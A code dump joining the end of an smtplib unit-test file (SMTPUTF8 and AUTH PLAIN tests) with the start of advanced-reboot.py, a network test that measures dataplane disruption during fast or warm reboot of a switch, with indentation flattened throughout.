self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received \r\n to \n, so we can't easily test that
# we are successfully sending \r\n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
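# A minimal sketch (not part of the original test suite) of how the AUTH PLAIN
# initial-response above is derived: it is the base64 encoding of
# "\0<user>\0<password>", which smtplib builds from the user and password when
# issuing "AUTH PLAIN <initial-response>" as a single command. The helper name
# below is hypothetical and exists only for illustration.
def _auth_plain_initial_response(user, password):
    import base64
    # NUL byte, authentication identity, NUL byte, password - base64 encoded
    # without a trailing newline (matching EXPECTED_RESPONSE above).
    raw = b'\0' + user.encode('ascii') + b'\0' + password.encode('ascii')
    return base64.b64encode(raw).decode('ascii')

assert _auth_plain_initial_response('psu', 'doesnotexist') == EXPECTED_RESPONSE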
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
advanced-reboot.py
|
#
# ptf --test-dir ptftests fast-reboot --qlen=1000 --platform remote -t 'verbose=True;dut_username="admin";dut_hostname="10.0.0.243";reboot_limit_in_seconds=30;portchannel_ports_file="/tmp/portchannel_interfaces.json";vlan_ports_file="/tmp/vlan_interfaces.json";ports_file="/tmp/ports.json";dut_mac="4c:76:25:f5:48:80";default_ip_range="192.168.0.0/16";vlan_ip_range="172.0.0.0/22";arista_vms="[\"10.0.0.200\",\"10.0.0.201\",\"10.0.0.202\",\"10.0.0.203\"]"' --platform-dir ptftests --disable-vxlan --disable-geneve --disable-erspan --disable-mpls --disable-nvgre
#
#
# This test checks that the DUT is able to perform the FastReboot procedure
#
# This test assumes that fast-reboot/warm-reboot is initiated by running the /usr/bin/{fast,warm}-reboot command.
#
# The test uses "pings". The "pings" are packets which are sent through the dataplane in two directions
# 1. From one of the vlan interfaces to a T1 device. The source ip, source interface, and destination IP are chosen randomly from valid choices. The number of packets is 100.
# 2. From all of the portchannel ports to all of the vlan ports. The source ip, source interface, and destination IP are chosen sequentially from valid choices.
# Currently we have 500 distinct destination vlan addresses. Our target is to have 1000 of them.
#
# The test sequence is as follows:
# 1. Check that the DUT is stable. That means that the "pings" work in both directions: from T1 to servers and from servers to T1.
# 2. If the DUT is stable, the test starts continuously pinging the DUT in both directions.
# 3. The test runs '/usr/bin/{fast,warm}-reboot' on the DUT remotely. The ssh key is supposed to be uploaded by ansible before the test.
# 4. As soon as it sees that pings start failing in one of the directions, the test registers the start of the dataplane disruption.
# 5. As soon as the test sees that pings start working for the DUT in both directions, it registers the stop of the dataplane disruption.
# 6. If the length of the disruption is less than 30 seconds (if not redefined by a parameter) - the test passes.
# 7. If there are any drops while the control plane is down - the test fails.
# 8. When the test starts the reboot procedure it connects to all VMs (which emulate T1) and starts fetching the status of BGP and LACP
# LACP is supposed to be down one time only, if not - the test fails
# if the default value of the BGP graceful restart timeout is less than 120 seconds - the test fails
# if BGP graceful restart is not enabled on the DUT - the test fails
# if the BGP graceful restart timeout is almost exceeded (less than 15 seconds left) - the test fails
# if BGP routes disappear more than once - the test fails
#
# The test expects that you are running it with the link state propagation helper.
# That helper propagates the link state from a fanout switch port to the corresponding VM port
#
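# A minimal, self-contained sketch (illustration only; the real logic lives in
# the ReloadTest class below) of the disruption accounting described above:
# the first failed "ping" marks the start of the dataplane disruption, the
# first subsequent success marks its end, and the run passes only if that
# window stays under the limit. All names here are hypothetical.
def _disruption_window_sketch(ping_results, limit_in_seconds=30):
    # ping_results: list of (timestamp_seconds, ok) tuples in send order
    start, stop = None, None
    for ts, ok in ping_results:
        if not ok and start is None:
            start = ts  # first failure: disruption starts
        elif ok and start is not None and stop is None:
            stop = ts   # first success after failures: disruption ends
    if start is None:
        return 0.0, True                  # no disruption observed
    if stop is None:
        return float('inf'), False        # dataplane never recovered
    return stop - start, (stop - start) < limit_in_seconds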
import ptf
from ptf.base_tests import BaseTest
from ptf import config
import ptf.testutils as testutils
from ptf.testutils import *
from ptf.dataplane import match_exp_pkt
import datetime
import time
import subprocess
from ptf.mask import Mask
import socket
import ptf.packet as scapy
import thread
import threading
from multiprocessing.pool import ThreadPool, TimeoutError
import os
import signal
import random
import struct
from pprint import pprint
from fcntl import ioctl
import sys
import json
import re
from collections import defaultdict
import Queue
import pickle
from operator import itemgetter
import scapy.all as scapyall
import itertools
from device_connection import DeviceConnection
import multiprocessing
from arista import Arista
import sad_path as sp
class StateMachine():
def __init__(self, init_state='init'):
self.state_lock = threading.RLock()
self.state_time = {} # Recording last time when entering a state
self.state = None
self.flooding = False
self.set(init_state)
def set(self, state):
with self.state_lock:
self.state = state
self.state_time[state] = datetime.datetime.now()
def get(self):
with self.state_lock:
cur_state = self.state
return cur_state
def get_state_time(self, state):
with self.state_lock:
time = self.state_time[state]
return time
def set_flooding(self, flooding):
with self.state_lock:
self.flooding = flooding
def is_flooding(self):
with self.state_lock:
flooding = self.flooding
return flooding
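# Illustrative usage sketch of StateMachine (for clarity only; not invoked by
# the test itself): state transitions record wall-clock entry times, so a
# downtime can be derived from two get_state_time() calls.
def _statemachine_usage_sketch():
    sm = StateMachine('init')
    sm.set('down')  # e.g. the dataplane probe starts failing
    sm.set('up')    # e.g. the dataplane probe succeeds again
    # timedelta spent in the 'down' state before entering 'up'
    return sm.get_state_time('up') - sm.get_state_time('down')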
class ReloadTest(BaseTest):
TIMEOUT = 0.5
PKT_TOUT = 1
VLAN_BASE_MAC_PATTERN = '72060001{:04}'
LAG_BASE_MAC_PATTERN = '5c010203{:04}'
SOCKET_RECV_BUFFER_SIZE = 10 * 1024 * 1024
def __init__(self):
BaseTest.__init__(self)
self.fails = {}
self.info = {}
self.cli_info = {}
self.logs_info = {}
self.log_lock = threading.RLock()
self.vm_handle = None
self.sad_handle = None
self.process_id = str(os.getpid())
self.test_params = testutils.test_params_get()
self.check_param('verbose', False, required=False)
self.check_param('dut_username', '', required=True)
self.check_param('dut_password', '', required=True)
self.check_param('dut_hostname', '', required=True)
self.check_param('reboot_limit_in_seconds', 30, required=False)
self.check_param('reboot_type', 'fast-reboot', required=False)
self.check_param('graceful_limit', 240, required=False)
self.check_param('portchannel_ports_file', '', required=True)
self.check_param('vlan_ports_file', '', required=True)
self.check_param('ports_file', '', required=True)
self.check_param('dut_mac', '', required=True)
self.check_param('dut_vlan_ip', '', required=True)
self.check_param('default_ip_range', '', required=True)
self.check_param('vlan_ip_range', '', required=True)
self.check_param('lo_prefix', '10.1.0.32/32', required=False)
self.check_param('lo_v6_prefix', 'fc00:1::/64', required=False)
self.check_param('arista_vms', [], required=True)
self.check_param('min_bgp_gr_timeout', 15, required=False)
self.check_param('warm_up_timeout_secs', 300, required=False)
self.check_param('dut_stabilize_secs', 30, required=False)
self.check_param('preboot_files', None, required=False)
self.check_param('preboot_oper', None, required=False) # preboot sad path to inject before warm-reboot
self.check_param('inboot_oper', None, required=False) # sad path to inject during warm-reboot
self.check_param('nexthop_ips', [], required=False) # nexthops for the routes that will be added during warm-reboot
self.check_param('allow_vlan_flooding', False, required=False)
self.check_param('sniff_time_incr', 60, required=False)
self.check_param('vnet', False, required=False)
self.check_param('vnet_pkts', None, required=False)
self.check_param('target_version', '', required=False)
self.check_param('bgp_v4_v6_time_diff', 40, required=False)
if not self.test_params['preboot_oper'] or self.test_params['preboot_oper'] == 'None':
self.test_params['preboot_oper'] = None
if not self.test_params['inboot_oper'] or self.test_params['inboot_oper'] == 'None':
self.test_params['inboot_oper'] = None
# initialize sad oper
if self.test_params['preboot_oper']:
self.sad_oper = self.test_params['preboot_oper']
else:
self.sad_oper = self.test_params['inboot_oper']
if self.sad_oper:
self.log_file_name = '/tmp/%s-%s.log' % (self.test_params['reboot_type'], self.sad_oper)
self.report_file_name = '/tmp/%s-%s.json' % (self.test_params['reboot_type'], self.sad_oper)
else:
self.log_file_name = '/tmp/%s.log' % self.test_params['reboot_type']
self.report_file_name = '/tmp/%s-report.json' % self.test_params['reboot_type']
self.log_fp = open(self.log_file_name, 'w')
self.packets_list = []
self.vnet = self.test_params['vnet']
if (self.vnet):
self.packets_list = json.load(open(self.test_params['vnet_pkts']))
# a flag of whether to populate the FDB by sending traffic from simulated servers
# usually the ARP responder will make the switch populate its FDB table, but Mellanox on 201803 has
# no L3 ARP support, so this flag is used to work around that issue
self.setup_fdb_before_test = self.test_params.get('setup_fdb_before_test', False)
# Default settings
self.ping_dut_pkts = 10
self.arp_ping_pkts = 1
self.nr_pc_pkts = 100
self.nr_tests = 3
self.reboot_delay = 10
self.task_timeout = 300 # Wait up to 5 minutes for tasks to complete
self.max_nr_vl_pkts = 500 # FIXME: should be 1000.
# But ptf is not fast enough + swss is slow for FDB and ARP entries insertions
self.timeout_thr = None
self.time_to_listen = 180.0 # Listen for more than 180 seconds, to be used in the sniff_in_background method.
# Inter-packet interval, to be used in the send_in_background method.
# Decreasing this interval gives a more precise measurement of disruptions.
self.send_interval = 0.0035
self.packets_to_send = min(int(self.time_to_listen / (self.send_interval + 0.0015)), 45000) # How many packets to be sent in send_in_background method
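# Worked numbers for the defaults above (illustration): 180.0 / (0.0035 + 0.0015) = 36000,
# so packets_to_send = min(36000, 45000) = 36000; generate_bidirectional later
# re-derives send_interval as 180.0 / 36000 = 0.005 seconds per packet.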
# Thread pool for background watching operations
self.pool = ThreadPool(processes=3)
# State watcher attributes
self.watching = False
self.cpu_state = StateMachine('init')
self.asic_state = StateMachine('init')
self.vlan_state = StateMachine('init')
self.vlan_lock = threading.RLock()
self.asic_state_time = {} # Recording last asic state entering time
self.asic_vlan_reach = [] # Recording asic vlan reachability
self.recording = False # Knob for recording asic_vlan_reach
# light_probe:
# True : when one direction probe fails, don't probe another.
# False: when one direction probe fails, continue probe another.
self.light_probe = False
# We have two data plane traffic generators which are mutually exclusive
# one is the reachability_watcher thread
# second is the fast send_in_background
self.dataplane_io_lock = threading.Lock()
self.allow_vlan_flooding = bool(self.test_params['allow_vlan_flooding'])
self.dut_connection = DeviceConnection(
self.test_params['dut_hostname'],
self.test_params['dut_username'],
password=self.test_params['dut_password'],
alt_password=self.test_params.get('alt_password')
)
# Check if platform type is kvm
stdout, stderr, return_code = self.dut_connection.execCommand("show platform summary | grep Platform | awk '{print $2}'")
platform_type = str(stdout[0]).replace('\n', '')
if platform_type == 'x86_64-kvm_x86_64-r0':
self.kvm_test = True
else:
self.kvm_test = False
return
def read_json(self, name):
with open(self.test_params[name]) as fp:
content = json.load(fp)
return content
def read_port_indices(self):
port_indices = self.read_json('ports_file')
return port_indices
def read_portchannel_ports(self):
content = self.read_json('portchannel_ports_file')
pc_ifaces = []
for pc in content.values():
pc_ifaces.extend([self.port_indices[member] for member in pc['members']])
return pc_ifaces
def read_vlan_ports(self):
content = self.read_json('vlan_ports_file')
if len(content) > 1:
raise Exception("Too many vlans")
return [self.port_indices[ifname] for ifname in content.values()[0]['members']]
def check_param(self, param, default, required = False):
if param not in self.test_params:
if required:
raise Exception("Test parameter '%s' is required" % param)
self.test_params[param] = default
def random_ip(self, ip):
net_addr, mask = ip.split('/')
n_hosts = 2**(32 - int(mask))
random_host = random.randint(2, n_hosts - 2)
return self.host_ip(ip, random_host)
def host_ip(self, net_ip, host_number):
src_addr, mask = net_ip.split('/')
n_hosts = 2**(32 - int(mask))
if host_number > (n_hosts - 2):
raise Exception("host number %d is greater than number of hosts %d in the network %s" % (host_number, n_hosts - 2, net_ip))
src_addr_n = struct.unpack(">I", socket.inet_aton(src_addr))[0]
net_addr_n = src_addr_n & (2**32 - n_hosts)
host_addr_n = net_addr_n + host_number
host_ip = socket.inet_ntoa(struct.pack(">I", host_addr_n))
return host_ip
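# Worked example for host_ip (illustration): with net_ip='192.168.0.0/16' there
# are 2**16 = 65536 host slots; masking keeps the network base, so
# host_ip('192.168.0.0/16', 300) == '192.168.1.44' (300 = 256 + 44).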
def random_port(self, ports):
return random.choice(ports)
def log(self, message, verbose=False):
current_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
with self.log_lock:
if (verbose and self.test_params['verbose']) or not verbose:
print "%s : %s" % (current_time, message)
self.log_fp.write("%s : %s\n" % (current_time, message))
self.log_fp.flush()
def timeout(self, func, seconds, message):
signal = multiprocessing.Event()
async_res = self.pool.apply_async(func, args=(signal,))
try:
res = async_res.get(timeout=seconds)
except Exception as err:
# TimeoutError and Exception's from func
# captured here
signal.set()
raise type(err)(message)
return res
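# Usage sketch for timeout() (illustration, mirroring calls made later in the
# test): wrap a blocking probe so it is abandoned after N seconds and the
# error is re-raised with a readable message, e.g.
#   self.timeout(self.wait_until_cpu_port_down, self.task_timeout,
#                "DUT hasn't shutdown in {} seconds".format(self.task_timeout))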
def generate_vlan_servers(self):
vlan_host_map = defaultdict(dict)
vlan_ip_range = self.test_params['vlan_ip_range']
_, mask = vlan_ip_range.split('/')
n_hosts = min(2**(32 - int(mask)) - 3, self.max_nr_vl_pkts)
for counter, i in enumerate(xrange(2, n_hosts + 2)):
mac = self.VLAN_BASE_MAC_PATTERN.format(counter)
port = self.vlan_ports[i % len(self.vlan_ports)]
addr = self.host_ip(vlan_ip_range, i)
vlan_host_map[port][addr] = mac
self.nr_vl_pkts = n_hosts
return vlan_host_map
def generate_arp_responder_conf(self, vlan_host_map):
arp_responder_conf = {}
for port in vlan_host_map:
arp_responder_conf['eth{}'.format(port)] = vlan_host_map[port]
return arp_responder_conf
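# Example of the resulting shape (illustrative values): each PTF interface name
# maps to the IP-to-MAC entries the ARP responder should answer for, e.g.
#   {'eth5': {'172.0.0.2': '720600010000', '172.0.0.34': '720600010032'}}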
def dump_arp_responder_config(self, dump):
# save data for arp_replay process
filename = "/tmp/from_t1.json" if self.sad_oper is None else "/tmp/from_t1_%s.json" % self.sad_oper
with open(filename, "w") as fp:
json.dump(dump, fp)
def get_peer_dev_info(self):
content = self.read_json('peer_dev_info')
for key in content.keys():
if 'ARISTA' in key:
self.vm_dut_map[key] = dict()
self.vm_dut_map[key]['mgmt_addr'] = content[key]['mgmt_addr']
# initialize all the port mapping
self.vm_dut_map[key]['dut_ports'] = []
self.vm_dut_map[key]['neigh_ports'] = []
self.vm_dut_map[key]['ptf_ports'] = []
def get_portchannel_info(self):
content = self.read_json('portchannel_ports_file')
for key in content.keys():
for member in content[key]['members']:
for vm_key in self.vm_dut_map.keys():
if member in self.vm_dut_map[vm_key]['dut_ports']:
self.vm_dut_map[vm_key]['dut_portchannel'] = str(key)
self.vm_dut_map[vm_key]['neigh_portchannel'] = 'Port-Channel1'
break
def get_neigh_port_info(self):
content = self.read_json('neigh_port_info')
for key in content.keys():
if content[key]['name'] in self.vm_dut_map.keys():
self.vm_dut_map[content[key]['name']]['dut_ports'].append(str(key))
self.vm_dut_map[content[key]['name']]['neigh_ports'].append(str(content[key]['port']))
self.vm_dut_map[content[key]['name']]['ptf_ports'].append(self.port_indices[key])
def build_peer_mapping(self):
'''
Builds a map of the form
'ARISTA01T1': {'mgmt_addr':
'neigh_portchannel'
'dut_portchannel'
'neigh_ports'
'dut_ports'
'ptf_ports'
}
'''
self.vm_dut_map = {}
for file in self.test_params['preboot_files'].split(','):
self.test_params[file] = '/tmp/' + file + '.json'
self.get_peer_dev_info()
self.get_neigh_port_info()
self.get_portchannel_info()
def build_vlan_if_port_mapping(self):
content = self.read_json('vlan_ports_file')
if len(content) > 1:
raise Exception("Too many vlans")
return [(ifname, self.port_indices[ifname]) for ifname in content.values()[0]['members']]
def populate_fail_info(self, fails):
for key in fails:
if key not in self.fails:
self.fails[key] = set()
self.fails[key] |= fails[key]
def get_sad_info(self):
'''
Prepares the msg string to log when a sad_oper is defined. Sad oper can be a preboot or inboot oper
sad_oper can be represented in the following ways
eg. 'preboot_oper' - a single VM will be selected and preboot_oper will be applied to it
'neigh_bgp_down:2' - 2 VMs will be selected and preboot_oper will be applied to the selected 2 VMs
'neigh_lag_member_down:3:1' - this case is used for lag member down operation only. This indicates that
3 VMs will be selected and 1 of the lag members in the portchannel will be brought down
'inboot_oper' - represents a routing change during warm boot (add or del of multiple routes)
'routing_add:10' - adding 10 routes during warm boot
'''
msg = ''
if self.sad_oper:
msg = 'Sad oper: %s ' % self.sad_oper
if ':' in self.sad_oper:
oper_list = self.sad_oper.split(':')
msg = 'Sad oper: %s ' % oper_list[0] # extract the sad oper_type
if len(oper_list) > 2:
# extract the number of VMs and the number of LAG members. sad_oper will be of the form oper:no of VMS:no of lag members
msg += 'Number of sad path VMs: %s Lag member down in a portchannel: %s' % (oper_list[-2], oper_list[-1])
else:
# inboot oper
if 'routing' in self.sad_oper:
msg += 'Number of ip addresses: %s' % oper_list[-1]
else:
# extract the number of VMs. preboot_oper will be of the form oper:no of VMS
msg += 'Number of sad path VMs: %s' % oper_list[-1]
return msg
def init_sad_oper(self):
if self.sad_oper:
self.log("Preboot/Inboot Operations:")
self.sad_handle = sp.SadTest(self.sad_oper, self.ssh_targets, self.portchannel_ports, self.vm_dut_map, self.test_params, self.vlan_ports)
(self.ssh_targets, self.portchannel_ports, self.neigh_vm, self.vlan_ports), (log_info, fails) = self.sad_handle.setup()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
if self.sad_oper:
log_info, fails = self.sad_handle.verify()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def do_inboot_oper(self):
'''
Add or del routes during boot
'''
if self.sad_oper and 'routing' in self.sad_oper:
self.log("Performing inboot operation")
log_info, fails = self.sad_handle.route_setup()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def check_inboot_sad_status(self):
if 'routing_add' in self.sad_oper:
self.log('Verify if new routes added during warm reboot are received')
else:
self.log('Verify that routes deleted during warm reboot are removed')
log_info, fails = self.sad_handle.verify(pre_check=False, inboot=True)
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def check_postboot_sad_status(self):
self.log("Postboot checks:")
log_info, fails = self.sad_handle.verify(pre_check=False, inboot=False)
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def sad_revert(self):
self.log("Revert to preboot state:")
log_info, fails = self.sad_handle.revert()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def setUp(self):
self.fails['dut'] = set()
self.port_indices = self.read_port_indices()
self.portchannel_ports = self.read_portchannel_ports()
self.vlan_ports = self.read_vlan_ports()
if self.sad_oper:
self.build_peer_mapping()
self.test_params['vlan_if_port'] = self.build_vlan_if_port_mapping()
self.vlan_ip_range = self.test_params['vlan_ip_range']
self.default_ip_range = self.test_params['default_ip_range']
self.limit = datetime.timedelta(seconds=self.test_params['reboot_limit_in_seconds'])
self.reboot_type = self.test_params['reboot_type']
if self.reboot_type not in ['fast-reboot', 'warm-reboot', 'warm-reboot -f']:
raise ValueError('Unsupported reboot_type %s' % self.reboot_type)
self.dut_mac = self.test_params['dut_mac']
if self.kvm_test:
self.log("This test is for KVM platform")
# get VM info
if isinstance(self.test_params['arista_vms'], list):
arista_vms = self.test_params['arista_vms']
else:
arista_vms = self.test_params['arista_vms'][1:-1].split(",")
self.ssh_targets = []
for vm in arista_vms:
if (vm.startswith("'") or vm.startswith('"')) and (vm.endswith("'") or vm.endswith('"')):
self.ssh_targets.append(vm[1:-1])
else:
self.ssh_targets.append(vm)
self.log("Converted addresses VMs: %s" % str(self.ssh_targets))
self.init_sad_oper()
self.vlan_host_map = self.generate_vlan_servers()
arp_responder_conf = self.generate_arp_responder_conf(self.vlan_host_map)
self.dump_arp_responder_config(arp_responder_conf)
self.random_vlan = random.choice(self.vlan_ports)
self.from_server_src_port = self.random_vlan
self.from_server_src_addr = random.choice(self.vlan_host_map[self.random_vlan].keys())
self.from_server_dst_addr = self.random_ip(self.test_params['default_ip_range'])
self.from_server_dst_ports = self.portchannel_ports
self.log("Test params:")
self.log("DUT ssh: %s@%s" % (self.test_params['dut_username'], self.test_params['dut_hostname']))
self.log("DUT reboot limit in seconds: %s" % self.limit)
self.log("DUT mac address: %s" % self.dut_mac)
self.log("From server src addr: %s" % self.from_server_src_addr)
self.log("From server src port: %s" % self.from_server_src_port)
self.log("From server dst addr: %s" % self.from_server_dst_addr)
self.log("From server dst ports: %s" % self.from_server_dst_ports)
self.log("From upper layer number of packets: %d" % self.nr_vl_pkts)
self.log("VMs: %s" % str(self.test_params['arista_vms']))
self.log("Reboot type is %s" % self.reboot_type)
self.generate_from_t1()
self.generate_from_vlan()
self.generate_ping_dut_lo()
self.generate_arp_ping_packet()
if 'warm-reboot' in self.reboot_type:
self.log(self.get_sad_info())
# Pre-generate list of packets to be sent in send_in_background method.
generate_start = datetime.datetime.now()
if not self.vnet:
self.generate_bidirectional()
self.log("%d packets are ready after: %s" % (len(self.packets_list), str(datetime.datetime.now() - generate_start)))
self.dataplane = ptf.dataplane_instance
for p in self.dataplane.ports.values():
port = p.get_packet_source()
port.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.SOCKET_RECV_BUFFER_SIZE)
self.dataplane.flush()
if config["log_dir"] != None:
filename = os.path.join(config["log_dir"], str(self)) + ".pcap"
self.dataplane.start_pcap(filename)
self.log("Enabling arp_responder")
self.cmd(["supervisorctl", "restart", "arp_responder"])
return
def setup_fdb(self):
""" simulate traffic generated from servers to help populate FDB """
vlan_map = self.vlan_host_map
from_servers_pkt = testutils.simple_tcp_packet(
eth_dst=self.dut_mac,
ip_dst=self.from_server_dst_addr,
)
for port in vlan_map:
for addr in vlan_map[port]:
mac = vlan_map[port][addr]
from_servers_pkt[scapy.Ether].src = self.hex_to_mac(mac)
from_servers_pkt[scapy.IP].src = addr
testutils.send(self, port, from_servers_pkt)
# make sure orchagent processed new FDBs
time.sleep(1)
def tearDown(self):
self.log("Disabling arp_responder")
self.cmd(["supervisorctl", "stop", "arp_responder"])
# Stop watching DUT
self.watching = False
if config["log_dir"] != None:
self.dataplane.stop_pcap()
self.log_fp.close()
def get_if(self, iff, cmd):
s = socket.socket()
ifreq = ioctl(s, cmd, struct.pack("16s16x",iff))
s.close()
return ifreq
@staticmethod
def hex_to_mac(hex_mac):
return ':'.join(hex_mac[i:i+2] for i in range(0, len(hex_mac), 2))
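# Example (illustration): hex_to_mac('5c0102030007') == '5c:01:02:03:00:07',
# i.e. the 12 hex digits are split into 6 colon-separated octets.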
def generate_from_t1(self):
self.from_t1 = []
# for each server host create a packet destined to the server IP
for counter, host_port in enumerate(self.vlan_host_map):
src_addr = self.random_ip(self.default_ip_range)
src_port = self.random_port(self.portchannel_ports)
for server_ip in self.vlan_host_map[host_port]:
dst_addr = server_ip
# generate source MAC address for traffic based on LAG_BASE_MAC_PATTERN
mac_addr = self.hex_to_mac(self.LAG_BASE_MAC_PATTERN.format(counter))
packet = simple_tcp_packet(eth_src=mac_addr,
eth_dst=self.dut_mac,
ip_src=src_addr,
ip_dst=dst_addr,
ip_ttl=255,
tcp_dport=5000)
self.from_t1.append((src_port, str(packet)))
# expect any packet with dport 5000
exp_packet = simple_tcp_packet(
ip_src="0.0.0.0",
ip_dst="0.0.0.0",
tcp_dport=5000,
)
self.from_t1_exp_packet = Mask(exp_packet)
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.Ether, "src")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "src")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "dst")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "chksum")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.TCP, "chksum")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "ttl")
def generate_from_vlan(self):
packet = simple_tcp_packet(
eth_dst=self.dut_mac,
ip_src=self.from_server_src_addr,
ip_dst=self.from_server_dst_addr,
tcp_dport=5000
)
exp_packet = simple_tcp_packet(
ip_src=self.from_server_src_addr,
ip_dst=self.from_server_dst_addr,
ip_ttl=63,
tcp_dport=5000,
)
self.from_vlan_exp_packet = Mask(exp_packet)
self.from_vlan_exp_packet.set_do_not_care_scapy(scapy.Ether, "src")
self.from_vlan_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.from_vlan_packet = str(packet)
def generate_ping_dut_lo(self):
dut_lo_ipv4 = self.test_params['lo_prefix'].split('/')[0]
packet = simple_icmp_packet(eth_dst=self.dut_mac,
ip_src=self.from_server_src_addr,
ip_dst=dut_lo_ipv4)
exp_packet = simple_icmp_packet(eth_src=self.dut_mac,
ip_src=dut_lo_ipv4,
ip_dst=self.from_server_src_addr,
icmp_type='echo-reply')
self.ping_dut_exp_packet = Mask(exp_packet)
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "id")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "chksum")
self.ping_dut_packet = str(packet)
def generate_arp_ping_packet(self):
vlan_ip_range = self.test_params['vlan_ip_range']
vlan_port_candidates = range(len(self.vlan_ports))
vlan_port_candidates.remove(0) # subnet prefix
vlan_port_candidates.remove(1) # subnet IP on dut
src_idx = random.choice(vlan_port_candidates)
vlan_port_candidates.remove(src_idx)
dst_idx = random.choice(vlan_port_candidates)
src_port = self.vlan_ports[src_idx]
dst_port = self.vlan_ports[dst_idx]
src_addr = self.host_ip(vlan_ip_range, src_idx)
dst_addr = self.host_ip(vlan_ip_range, dst_idx)
src_mac = self.hex_to_mac(self.vlan_host_map[src_port][src_addr])
packet = simple_arp_packet(eth_src=src_mac, arp_op=1, ip_snd=src_addr, ip_tgt=dst_addr, hw_snd=src_mac)
expect = simple_arp_packet(eth_dst=src_mac, arp_op=2, ip_snd=dst_addr, ip_tgt=src_addr, hw_tgt=src_mac)
